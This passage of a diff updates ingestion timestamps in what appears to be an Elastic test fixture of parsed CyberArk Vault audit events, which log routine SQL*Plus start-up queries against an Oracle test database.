Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:44\",\"IsoTimestamp\":\"2021-03-25T14:56:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=BEGIN DBMS_OUTPUT.DISABLE\\\\; END\\\\;;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=123B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", @@ -340,7 +340,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.776971400Z", + "ingested": "2021-12-09T13:36:58.683112Z", "original": "\u003c5\u003e1 2021-03-25T14:56:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT ATTRIBUTE,SCOPE,NUMERIC_VALUE,CHAR_VALUE,DATE_VALUE FROM SYSTEM.PRODUCT_PRIVS WHERE (UPPER('SQL*Plus') LIKE UPPER(PRODUCT)) AND (UPPER(USER) LIKE USERID);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=187B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:44\",\"IsoTimestamp\":\"2021-03-25T14:56:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT ATTRIBUTE,SCOPE,NUMERIC_VALUE,CHAR_VALUE,DATE_VALUE FROM SYSTEM.PRODUCT_PRIVS WHERE (UPPER('SQL*Plus') LIKE UPPER(PRODUCT)) AND (UPPER(USER) LIKE USERID);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=187B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", @@ -459,7 +459,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.776973800Z", + "ingested": "2021-12-09T13:36:58.683116100Z", "original": "\u003c5\u003e1 2021-03-25T14:56:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT CHAR_VALUE FROM SYSTEM.PRODUCT_PRIVS WHERE (UPPER('SQL*Plus') LIKE UPPER(PRODUCT)) AND ((UPPER(USER) LIKE USERID) OR (USERID \\\\= 'PUBLIC')) AND (UPPER(ATTRIBUTE) \\\\= 'ROLES');ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=380B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:44\",\"IsoTimestamp\":\"2021-03-25T14:56:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT CHAR_VALUE FROM SYSTEM.PRODUCT_PRIVS WHERE (UPPER('SQL*Plus') LIKE UPPER(PRODUCT)) AND ((UPPER(USER) LIKE USERID) OR (USERID \\\\= 'PUBLIC')) AND (UPPER(ATTRIBUTE) \\\\= 'ROLES');ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=380B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", @@ -578,7 +578,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.776976100Z", + "ingested": "2021-12-09T13:36:58.683121400Z", "original": "\u003c5\u003e1 2021-03-25T14:56:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=BEGIN DBMS_APPLICATION_INFO.SET_MODULE(:1,NULL)\\\\; END\\\\; (Parameters bound by position: 1\\\\=[SQL*Plus]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=596B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:44\",\"IsoTimestamp\":\"2021-03-25T14:56:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=BEGIN DBMS_APPLICATION_INFO.SET_MODULE(:1,NULL)\\\\; END\\\\; (Parameters bound by position: 1\\\\=[SQL*Plus]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=596B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", @@ -697,7 +697,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.776978400Z", + "ingested": "2021-12-09T13:36:58.683125200Z", "original": "\u003c5\u003e1 2021-03-25T14:56:45Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:45\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:45Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT DECODE('A','A','1','2') FROM DUAL;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=727B;SrcHost=127.0.0.1;User=HR;VIDOffset=5T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:45\",\"IsoTimestamp\":\"2021-03-25T14:56:45Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT DECODE('A','A','1','2') FROM DUAL;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=727B;SrcHost=127.0.0.1;User=HR;VIDOffset=5T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", @@ -816,7 +816,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.776980600Z", + "ingested": "2021-12-09T13:36:58.683128900Z", "original": "\u003c5\u003e1 2021-03-25T14:56:54Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:54\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:54Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT INFO FROM SYSTEM.HELP WHERE UPPER(TOPIC) LIKE :1 ORDER BY TOPIC,SEQ (Parameters bound by position: 